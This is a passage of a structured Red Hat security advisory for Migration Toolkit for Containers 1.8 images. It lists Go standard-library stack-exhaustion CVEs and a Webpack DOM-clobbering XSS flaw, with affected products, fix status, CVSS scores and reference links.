"https://pkg.go.dev/vuln/GO-2024-3105", }, ], release_date: "2024-09-06T21:15:11.947000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", }, { cve: "CVE-2024-34156", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:09.377905+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310528", }, ], notes: [ { category: "description", text: "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.", title: "Vulnerability description", }, { category: "summary", text: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in Go's `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34156", }, { category: "external", summary: "RHBZ#2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34156", url: "https://www.cve.org/CVERecord?id=CVE-2024-34156", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", }, { category: "external", summary: "https://go.dev/cl/611239", url: "https://go.dev/cl/611239", }, { category: "external", summary: "https://go.dev/issue/69139", url: "https://go.dev/issue/69139", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3106", url: "https://pkg.go.dev/vuln/GO-2024-3106", }, ], release_date: "2024-09-06T21:15:12.020000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-34158", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2024-09-06T21:20:12.126400+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310529", }, ], notes: [ { category: "description", text: "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.", title: "Vulnerability description", }, { category: "summary", text: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34158", }, { category: "external", summary: "RHBZ#2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34158", url: "https://www.cve.org/CVERecord?id=CVE-2024-34158", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34158", }, { category: "external", summary: "https://go.dev/cl/611240", url: "https://go.dev/cl/611240", }, { category: "external", summary: "https://go.dev/issue/69141", url: "https://go.dev/issue/69141", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3107", url: "https://pkg.go.dev/vuln/GO-2024-3107", }, ], release_date: "2024-09-06T21:15:12.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: 